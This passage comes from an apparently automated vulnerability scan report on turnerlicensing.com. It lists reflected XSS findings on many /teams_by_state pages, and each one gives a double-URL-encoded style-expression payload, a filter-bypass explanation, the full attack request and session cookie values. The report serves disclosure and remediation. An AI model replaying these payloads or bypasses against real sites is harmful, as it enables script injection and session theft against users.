Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.219. http://www.turnerlicensing.com/teams_by_state/North-Dakota [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/North-Dakota
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4fdb3%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d6800f7fe01 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4fdb3'style='x:expression(alert(1))'d6800f7fe01 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/North-Dakota?4fdb3%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d6800f7fe01=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.220. http://www.turnerlicensing.com/teams_by_state/Ohio [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Ohio
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6304b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d67f8a8edb6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6304b'style='x:expression(alert(1))'d67f8a8edb6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Ohio?6304b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d67f8a8edb6=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.221. http://www.turnerlicensing.com/teams_by_state/Oklahoma [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Oklahoma
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f9598%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527673ea07282e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f9598'style='x:expression(alert(1))'673ea07282e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Oklahoma?f9598%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527673ea07282e=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.222. http://www.turnerlicensing.com/teams_by_state/Oregon [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Oregon
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3239c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270a7c4969562 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3239c'style='x:expression(alert(1))'0a7c4969562 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Oregon?3239c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270a7c4969562=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.223. http://www.turnerlicensing.com/teams_by_state/Ottawa [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Ottawa
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 885e7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527749e6052f63 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 885e7'style='x:expression(alert(1))'749e6052f63 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Ottawa?885e7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527749e6052f63=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.224. http://www.turnerlicensing.com/teams_by_state/Pennsylvania [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Pennsylvania
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ffcbc%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ef6395e1920 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ffcbc'style='x:expression(alert(1))'ef6395e1920 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Pennsylvania?ffcbc%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ef6395e1920=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.225. http://www.turnerlicensing.com/teams_by_state/Rhode-Island [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Rhode-Island
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a84dc%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252717befc6fc54 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a84dc'style='x:expression(alert(1))'17befc6fc54 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Rhode-Island?a84dc%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252717befc6fc54=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.226. http://www.turnerlicensing.com/teams_by_state/South-Carolina [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/South-Carolina
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 62e79%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527dc0d0d2a4ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 62e79'style='x:expression(alert(1))'dc0d0d2a4ae in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/South-Carolina?62e79%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527dc0d0d2a4ae=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.227. http://www.turnerlicensing.com/teams_by_state/South-Dakota [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/South-Dakota
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 29abe%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527456eef5a39 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 29abe'style='x:expression(alert(1))'456eef5a39 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/South-Dakota?29abe%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527456eef5a39=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.228. http://www.turnerlicensing.com/teams_by_state/Tennessee [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Tennessee
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a95b2%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527349b7eab0ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a95b2'style='x:expression(alert(1))'349b7eab0ec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Tennessee?a95b2%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527349b7eab0ec=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.229. http://www.turnerlicensing.com/teams_by_state/Texas [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Texas
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4e897%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527fd511f150a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4e897'style='x:expression(alert(1))'fd511f150a8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Texas?4e897%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527fd511f150a8=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.230. http://www.turnerlicensing.com/teams_by_state/Toronto [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Toronto
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f3d65%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252787f866157d7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f3d65'style='x:expression(alert(1))'87f866157d7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Toronto?f3d65%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252787f866157d7=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.231. http://www.turnerlicensing.com/teams_by_state/Utah [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Utah
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d76ae%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25279da4365e664 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d76ae'style='x:expression(alert(1))'9da4365e664 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Utah?d76ae%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25279da4365e664=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.232. http://www.turnerlicensing.com/teams_by_state/Vancouver [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Vancouver
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d512d%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270ec04acb8d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d512d'style='x:expression(alert(1))'0ec04acb8d9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Vancouver?d512d%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270ec04acb8d9=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.233. http://www.turnerlicensing.com/teams_by_state/Vermont [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Vermont
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 72a41%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252734af1748ca7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 72a41'style='x:expression(alert(1))'34af1748ca7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Vermont?72a41%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252734af1748ca7=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
